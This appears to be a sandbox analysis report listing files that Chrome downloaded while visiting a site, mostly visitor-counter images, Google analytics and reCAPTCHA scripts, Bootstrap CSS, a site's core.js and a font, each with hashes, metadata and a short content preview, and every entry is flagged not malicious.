                    Preview:.PNG........IHDR...Q...........p.....PLTE......vvv..............................rrr...........................ppp...........}}}zzzwww.........ttt............\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF..........tRNS.@..f....IDATH....S.A...#vE......AD...{...{...+.......!1$* d.K#.p.D.r?.|f..}so..dn....4.J..Q.+3...4.&.9.a..\1=R#...%.:.:1/B.Gjde..."..i...E..d..H...hg'...?.9"....S%....>......u..[y.'...&z........k...O.V...&.j......j....[.......`*
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:downloaded
                    Size (bytes):1398
                    Entropy (8bit):7.683614871341489
                    Encrypted:false
                    SSDEEP:24:PnT2QQnjcJAXN9KOBuoovSzIv6Ii4cXagbib1Rkrg+DL2IUnD5FgmTkMnM8:PT2vjc+9vgrvxcKwkRkrpX21nD5Flnt
                    MD5:0ECE7C5A2926093854DCDA78CD733E2A
                    SHA1:E810A80EB5B1FD33929F644D57DAA7FB0F66A3F2
                    SHA-256:96EDEAA73C4079D0661443F60DF600927167B23B46EC7AA5BE215346850226BB
                    SHA-512:1AF07EC146E786BE6537D57BB6BA3AF0FFB0F8888F1A59D6490AECB9578A425CCB06A89B5147B888D518F854A860DEB703B14A5D510456019F2DCC392B493EAD
                    Malicious:false
                    Reputation:low
                    URL:https://widgets.amung.us/classic/00/55.png
                    Preview:.PNG........IHDR...Q...........p.....PLTE...rrr...........................ppp...........}}}zzzwww.........ttt............\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF...2R......tRNS.@..f....IDATH....S.`....]..V.4PQ.....{...........KFY...V...m.$./.I..$.O4......\..{......d.h.....) ...+=:`...b.0.....2....^.gG#)..2B).8#..gY... .V........D..\s.pd.xw..n.q....8r..K....7..^n.Pd..0*. ..8.[........./pR..`.Z=HT8.u...^...._l...$.D.."+.,.zFG23....a..B5.a$..`Y
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:downloaded
                    Size (bytes):1693
                    Entropy (8bit):7.7637669412840875
                    Encrypted:false
                    SSDEEP:24:qV4Pq59mpnjcJAXN9KOBuoovSzIv6IyDVo3++CbFobn5pLtOF9oQrMmPrewaVjjo:sCjc+9vgrvrGbCBO5reNVXYNh
                    MD5:E77E3FCB618DB9C2F182C5A8D56EF81D
                    SHA1:C42B198B83ED14663C6FB8E31F82239E6CA1F0F3
                    SHA-256:9599B6E6AA8992F53C3CE418C07C18CEB2535FD0F7F785166245D8E2ED46F4B3
                    SHA-512:C7CFD2EAEFAA5A47FB2B77430E9203621AF2CD02F88248AE94BC6BAE668A4746183EDCF278B45CB551B9D7EA901F55AC8D2204DF4B7299020E8AEDC8A9FDD532
                    Malicious:false
                    Reputation:low
                    URL:https://widgets.amung.us/classic/14/1453.png
                    Preview:.PNG........IHDR...Q...........p.....PLTE.......................}}}www.........ttt............................zzz.........vvvrrr......................................ppp........\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF...4.N.....tRNS.@..f...rIDATH....WSW....@E....jM@L. .<H.E.(U.j.u...Z..P....G..m.n..u.Fj .`x.a......_.{.{/M0.".....|ONN...B.i........v".yZt..7.E..&..i._....|....j.J...|`....h.9GV.\.bt.n.f..q...-.9.V...fj....^1?>.....&...cg
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:SVG Scalable Vector Graphics image
                    Category:dropped
                    Size (bytes):6225
                    Entropy (8bit):5.976934819783072
                    Encrypted:false
                    SSDEEP:96:+R2K3Z4n7tyVwip82hezk6227gLFoXhu1XuE20ot+pVY3YptWDzOzgXK3Zx:ql3KnxyGGMzb7noR20NTww33
                    MD5:2BD5C073A88B83ED74DB88282A56DDFB
                    SHA1:D0EBFC376F8C6A44A8D4CD216817DCD7D0C33650
                    SHA-256:AB5C23A05E39DEED14D9D8262B0DCE9F024F86105A27196CAD37D14A3F516E09
                    SHA-512:5C6C4A92E93FC0F6A675658CC84F6187FDEBD3EEE94EFD07E24658736CBA598F3BC7156B19834B13FB44C1D43FCB7DF9FCCA7F0A453037E30DA76BA8F4B23B89
                    Malicious:false
                    Reputation:low
                    Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><defs><path d="M21.5 5h-9.17L11 1H2.5C1.68 1 1 1.68 1 2.5v15c0 .83.68 1.5 1.5 1.5h9.17L13 23h8.5c.82 0 1.5-.68 1.5-1.5v-15c0-.83-.68-1.5-1.5-1.5z" id="a"/></defs><clipPath id="b"><use overflow="visible" xlink:href="#a"/></clipPath><g clip-path="url(#b)"><image height="31" opacity=".2" overflow="visible" transform="translate(3 1)" width="29" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB0AAAAfCAYAAAAbW8YEAAAACXBIWXMAAAsSAAALEgHS3X78AAAA GXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAABQBJREFUeNq8V8tu20YUvXdm+LCk RKiMwI1TFEXhVZJd1gW66xekv9DPqPsvXdU/UaDroJskKy+CInCcGpKtFy2SM/f2DEXZia0odtKW AkFJ8zhzzn3S0Ycvps+79EMDbj3Yfgv4EM+XTN/fEOb3Zg3AXmq7j64D5/e/x/EfzZMnX5jx+LFZ LLyp6yNDOzskYb6RubFdpbdvKUl2Jc+d9PvP5dmzUyH6TVoYXQOq+H5g9vb+cONsO9maLpIyyZPU kZNAppmh9Vpg5kSXwCSVJ5/Vi/r8Tl73y2F9ePidJ3oaga+B4vkUgF+6EW1ndz11gvNdDdL1bDN
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (2343)
                    Category:downloaded
                    Size (bytes):52916
                    Entropy (8bit):5.51283890397623
                    Encrypted:false
                    SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                    MD5:575B5480531DA4D14E7453E2016FE0BC
                    SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                    SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                    SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                    Malicious:false
                    Reputation:low
                    URL:https://www.google-analytics.com/analytics.js
                    Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:downloaded
                    Size (bytes):1522
                    Entropy (8bit):7.733474929922132
                    Encrypted:false
                    SSDEEP:24:hB5T2QQnjcJAXN9KOBuoovSzIv6IbOYIlTuaawpp9a+f8y3PR+ijVPFBEKvCpHgK:f92vjc+9vgrvrCTaw7ZfjfR+ijxupHln
                    MD5:8F66DD9E4F49A6A1D42967356278E340
                    SHA1:97EAF30B747BB76EB8CE2953095FABF746EDEB39
                    SHA-256:C0124680377030216680CBBFA9D94C935426E26D4E4E78DBB43D900742F51272
                    SHA-512:A6F7292C8C2C4A9B0054B95BB2D421E214153B9FD7D40B5CF3C5A98033C9E81FCA0BBDA636A73F5439C53FF2F5C4AB029EE3109980936C1F4BD726DC747CC9BA
                    Malicious:false
                    Reputation:low
                    URL:https://widgets.amung.us/classic/00/56.png
                    Preview:.PNG........IHDR...Q...........p.....PLTE...............................rrr...........................ppp...........}}}zzzwww.........ttt............\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF...........tRNS.@..f....IDATH....S.A...EElt.....9..@.b...{.........7).CbHT@.&.F...%.^._H>3....7on2......qu..g..u.H...4...i..zE.......GX/!.8V.G*D......)..LI...j....1N....}.f...z ...7_.0{7C.y.Z....l..../..U`i.`lP{....B..#..7..s..$.....-......0W...E.IA=.
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with no line terminators
                    Category:downloaded
                    Size (bytes):64
                    Entropy (8bit):4.492897276113269
                    Encrypted:false
                    SSDEEP:3:InEwpCkoSySv6yukbbkpYn:wpoSySv6yF8pY
                    MD5:C0DDB93C144B94DA946DC9F727D05538
                    SHA1:517BA8265D63543D2F4F2D3E2247A9A9CEE79E9D
                    SHA-256:4760B35732ACF6B7C363E144C5FD126EAFEE7315885510FEAF23B0D53938D33F
                    SHA-512:FE7BBEF81355A517C2124C01EBA6CB7460E36F0E608849E37721C23B53FE1C9349CBE949016BCD2CABF97629AAB127CC6318B5EC4F6ED87BDB2982580843AD73
                    Malicious:false
                    Reputation:low
                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISLAn9uqUg1dGU6RIFDRVQj_4SBQ1a3e0uEgUNUopJoxIFDUC-9V0SBQ1AWQ9b?alt=proto
                    Preview:Ci0KBw0VUI/+GgAKBw1a3e0uGgAKBw1SikmjGgAKBw1AvvVdGgAKBw1AWQ9bGgA=
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:downloaded
                    Size (bytes):1509
                    Entropy (8bit):7.732240525400323
                    Encrypted:false
                    SSDEEP:24:VT2QQnjcJAXN9KOBuoovSzIv6IVxjOtvQYJXVZ7IWSdcbT2cqEMRUAUnkrL4oxMj:R2vjc+9vgrvmtvQ+776d4T2xUApfzx0T
                    MD5:E51DB1800E42FA0F270AB8C26D110DCA
                    SHA1:7726BBCC5ECF5E3795B5789F9E525675E85C6A5D
                    SHA-256:774F3F1C24589B3B75D12CE84A8C65E8E2E59097D388CD109A80BDA44FE459FA
                    SHA-512:C96EB8D26333FD74E9988BB2250908D0DB19FEEFA01F1E7F89EB0CFC906BF235403114B4A29FF1C1A7F5549FCB4345CFEAAAB6DD821CB73F37703B1201FAFE6E
                    Malicious:false
                    Reputation:low
                    URL:https://widgets.amung.us/classic/00/53.png
                    Preview:.PNG........IHDR...Q...........p.....PLTE......vvv..............................rrr...........................ppp...........}}}zzzwww.........ttt............\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF..........tRNS.@..f....IDATH....S.A...#vE......AD...{...{...+.......!1$* d.K#.p.D.r?.|f..}so..dn....4.J..Q.+3...4.&.9.a..\1=R#...%.:.:1/B.Gjde..."..i...E..d..H...hg'...?.9"....S%....>......u..[y.'...&z........k...O.V...&.j......j....[.......`*
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (1414), with no line terminators
                    Category:downloaded
                    Size (bytes):1414
                    Entropy (8bit):5.778716403292963
                    Encrypted:false
                    SSDEEP:24:2jkm94/zKPccAv+KVC4TLv138EgFB5vtTGJrdcl/1t4glvllLtd1ATw1HsLqo40Y:VKEctKomR3evtTA2tX7TGw1MLrwUnG
                    MD5:40CFAE3B5462CABE5C2CFAFA279227CB
                    SHA1:56CD07648D373760809DBF9515F6E5376DFF04A4
                    SHA-256:CD22C5327CD617FB47A47DF6E46DD055B0B5A4775D22B394B5968284D2CFFE91
                    SHA-512:E0911068E87AFAD83F2943CBFF005B146641C1F5D81E24B13C6E3ECF7CC24D2E1329F8C19DB73AD69AE9EB62B263BF2143D297221EC0452B76527BAF6770BB75
                    Malicious:false
                    Reputation:low
                    URL:https://www.google.com/recaptcha/api.js
                    Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m);}});}else{d.head.pr
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (65142), with CRLF line terminators
                    Category:downloaded
                    Size (bytes):141313
                    Entropy (8bit):5.139248089854753
                    Encrypted:false
                    SSDEEP:1536:oOw/5mQIZ4WG78T02X/+RGbrtBQr5mtxgi:OChXQr5mtT
                    MD5:EB6DA92D76C35B15A53CCF42EC8E65AE
                    SHA1:304DC1017B6F1D95C81EEB65B749A9715C60BC00
                    SHA-256:338F3FB527D31619188424F08BFDA6927205EF73C5F1D8E94459A13344003277
                    SHA-512:EFE46E5D4906B88021663849000869A36D012F4FC7AB7D52BA9A1EF1FC544DE46E860AA0415432FF671A73F422EC188012AF547AEEF178DC34AEC3DE85461EFA
                    Malicious:false
                    Reputation:low
                    URL:https://anatakip.com/assets/bootstrap/css/bootstrap-paper.min.css
                    Preview:@import url("https://fonts.googleapis.com/css?family=Roboto:300,400,500,700");/*!.. * bootswatch v3.3.6.. * Homepage: http://bootswatch.com.. * Copyright 2012-2015 Thomas Park.. * Licensed under MIT.. * Based on Bootstrap..*//*!.. * Bootstrap v3.3.6 (http://getbootstrap.com).. * Copyright 2011-2015 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:0.67em 0}
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:downloaded
                    Size (bytes):1695
                    Entropy (8bit):7.792791008858268
                    Encrypted:false
                    SSDEEP:24:NLs4Pq59mpnjcJAXN9KOBuoovSzIv6IWMq09Wzj5VyhMm5Bz2ycaLOQbEY6SXx:tsCjc+9vgrvXq09WzjiqmrncaZA4x
                    MD5:D181F2C1A30A3F45A613CBE7048947E3
                    SHA1:4C1DC4EC544E78278C1B1B25275BAF4A36A8EAA0
                    SHA-256:DA0DE6CDB7D4A04D877D470ABAF30F91448D140454523C0817FB5151DC09CA38
                    SHA-512:7B7EB1945F54047A23E35A021D9D33CAF3B1DC0074B5B5BA0A1306705DDCA93ABB3FA7B8B61C7CE8289A8F8B3EE2273F6427D5A954C4ED5B368F6579153D1F48
                    Malicious:false
                    Reputation:low
                    URL:https://widgets.amung.us/classic/14/1406.png
                    Preview:.PNG........IHDR...Q...........p.....PLTE........................................ttt............................zzz.........vvvrrr......................................ppp........\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF...3.......tRNS.@..f...qIDATH....[[U...#.DQ(TD.(.....\H..).......=.n]m..[K........Br#C....&.....s...._$...}..=..>y..."....b..k....;..h...5k.n.5........h...*&.J..2..*....}.b..../F.Vc.....s>/X.v...j-.>..O....?....6#q...?.z..
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:downloaded
                    Size (bytes):1703
                    Entropy (8bit):7.7912309701979545
                    Encrypted:false
                    SSDEEP:48:y38zjc+9vgrv0lz9ZRMkolAVJ9lJJBBUAhxGwT:kuw9vYzTRNVJL3DhIwT
                    MD5:4D5647E66CF72A64CB9E67DA057E5B0C
                    SHA1:59391F0638820E32B19378D655DA1A783F60BA31
                    SHA-256:C65426C62D207905D3433DD0A2777599B0160B7314E2E8DE588CE5DF56A460C2
                    SHA-512:7D15C193E5F76DEF62362EA282C687B918E5FDE49B82C4F77A464C4D7F95386CF6A766EED7427E4960605B61115F5688DFAD5A260D4C1EEC654D87405FCD3106
                    Malicious:false
                    Reputation:low
                    URL:https://widgets.amung.us/classic/13/1365.png
                    Preview:.PNG........IHDR...Q...........p.....PLTE......}}}.......................zzz................................www.....ttt..........vvvrrr......................................ppp........\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF...}.......tRNS.@..f...vIDATH....W.W...U(....[.`0.An..V$F...U[....kk]Z...j[..%..U.....@\*.V!.....&...?.o.A....%.s....3.99.d.B.a.k..:.`C)v .q\...:...E...0.M;..qy....H...zL.......i{j.z0*.7.1[.\&..!.#.4\A..f.....=o..<..5
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:Unicode text, UTF-8 text, with very long lines (703)
                    Category:downloaded
                    Size (bytes):11083
                    Entropy (8bit):5.349916447555337
                    Encrypted:false
                    SSDEEP:192:Vt89xvGjGCXGidGlxIa/uSRskU6FHXwXYRas2rf:Vt8LvQdXtSfuUjHXwEaf
                    MD5:525F9925ADCAA1850604005B9853FB94
                    SHA1:C8449EACB86CD51A693069111CCB8FB672A2A22B
                    SHA-256:D83CB271330E1CF5F351272FAA73138188BB656ADC21561D2A12F95B417DA74E
                    SHA-512:1AF792AE405ADA5BEF5BCA323381CEB5E18C15DD401A46E7A3B4333E00BFC1D2D102703AD56E203F56FCBA2338270B8130C8B2E42D25B7365144236AD4FCF318
                    Malicious:false
                    Reputation:low
                    URL:https://anatakip.com/assets/core/core.js?v=3.1.10
                    Preview:function loadMore(maxID){$('#btnLoadMore').remove();$('#entry-list-row').first().append('<div class="tempLoading"><i class="fa fa-spinner fa-spin fa-2x"></i> Y.kl.yor..</div>');$.ajax({url:'?formType=more',type:'POST',data:'maxid='+maxID}).done(function(response){$('#entry-list-row').append(response);$('.tempLoading').remove();setLightBox(true);$(".lazy").show().lazyload({threshold:500}).removeClass("lazy");});}.function editMedia(id){$('#modalEditMediaInner').html('<div class="modal-body"><h2>Bekleyin..</h2></div>');$.ajax({url:'/account/edit-media/'+id,type:'GET'}).done(function(data){$('#modalEditMediaInner').html(data);});}.function updateMedia(id){$('#modalEditMedia').modal('hide');$.ajax({url:'/account/edit-media/'+id,type:'POST',dataType:'json',data:$('#formEditMedia').serialize()}).done(function(data){if(data.status=='success'){getCommentList(id);}.else{alert(data.message);}});}.function deleteMedia(id){$('#entry'+id).hide();$.ajax({url:'/account/delete-media',dataType:'json'
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 42 x 16, 8-bit/color RGBA, non-interlaced
                    Category:downloaded
                    Size (bytes):910
                    Entropy (8bit):7.7455040862049085
                    Encrypted:false
                    SSDEEP:24:do/cXeTrHaRodw+UWNhsGzRSIhAugV7unmH4ifkx08v5:K/cXeqadLUWNhNzRSMXgV7unbisx08B
                    MD5:EFA6BB2BFE459BC6F4BDAFA3DB0383F6
                    SHA1:52D15CE52FE50643E542C17812DE43F4ED1B6EE0
                    SHA-256:6318394F737C66F0E2CCFCD88E3935C6667633A1B95FA29FBA2B75431D55EEF2
                    SHA-512:E23C04D8997F5C2F92070E09261B7EE50D9DF8753F45CF66F604F0874FFA8D99E947C97C528EC02A2C3FBE8E43D840B343A7D0225532980D5DA95031216415B7
                    Malicious:false
                    Reputation:low
                    URL:https://www.gstatic.com/images/branding/googlelogo/1x/googlelogo_color_42x16dp.png
                    Preview:.PNG........IHDR...*.........`"....UIDATx..T...=.Mm......&[....Sl..m.m....U....;.uf..frrr...v...U)...).....2Q..`.y.*...U.9..;..0.^........B.......].h.^..... . L3....jQw..vB.D....<..P.4..|.B....d..?.....Qv.....Dv..$...._.|.*.@........k....`..JG...$..T.y|T.......v.iH...yc6'...%..&.w.oI.ZS{..!6A@.Y.....a....U]..:...g-......01F........Q...k#..G\....~.+....z.>....F...}1[..~.9..r[.?..9......2~....e."1.).}[.WW.{.r...|D..<7..t.M.`..S...8.ab..F ....n..S.:n.>1(g.p$.:k1..6...Y..@.5.8.0y.....R...;.K\. 0p...g.,r.E...............=.....!.^..Y!..D.Z.....aV.....;F.4...!.`^.L.VQ.....&...d....O.\...I).!1....{......K.f*.e ....L......~.%IY(..Y.....NeA...?.^..2.C..^........P....)T.&?.zm.Sl.b..l.D...%.{.B>X{.9Y..M..:.)......EK..b.......}....|.o..].....GH?..3F.B(.:.....AdA........Z... .L....)..@?...f.F....6......u..oQfMC.....OC.1[3..j..j.G...&..D`........@>...g....IEND.B`.
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:Web Open Font Format (Version 2), TrueType, length 15744, version 1.0
                    Category:downloaded
                    Size (bytes):15744
                    Entropy (8bit):7.986588355476176
                    Encrypted:false
                    SSDEEP:384:z1TLklSElcS5V6qQTMUP07JwirW6RlLwK79/:p7EJ5E2bJwi5jLwK79/
                    MD5:15D9F621C3BD1599F0169DCF0BD5E63E
                    SHA1:7CA9C5967F3BB8BFFEAB24B639B49C1E7D03FA52
                    SHA-256:F6734F8177112C0839B961F96D813FCB189D81B60E96C33278C1983B6F419615
                    SHA-512:D35A47162FC160CD5F806C3BB7FEB50EC96FDFC81753660EAD22EF33F89BE6B1BFD63D1135F6B479D35C2E9D30F2360FFC8819EFCA672270E230635BCB206C82
                    Malicious:false
                    Reputation:low
                    URL:https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4mxK.woff2
